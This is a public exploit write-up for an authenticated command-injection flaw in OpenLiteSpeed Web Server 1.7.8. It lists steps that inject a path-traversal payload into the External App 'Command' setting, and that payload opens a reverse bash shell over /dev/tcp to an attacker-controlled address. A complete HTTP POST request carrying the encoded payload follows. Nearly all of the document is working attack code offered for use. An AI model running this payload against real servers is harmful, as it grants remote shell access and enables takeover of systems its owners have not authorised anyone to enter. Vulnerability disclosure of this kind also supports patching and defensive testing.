Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)

# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
# Date: 26/1/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
# Tested on Windows 10


Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > External App > Command
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
Step 5: Graceful Restart

[POC]

POST /view/confMgr.php HTTP/1.1
Host: target:7080
Connection: close
Content-Length: 579
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://target:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
LSPA37FE0C43B84483E0=excYiZbpUS4%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077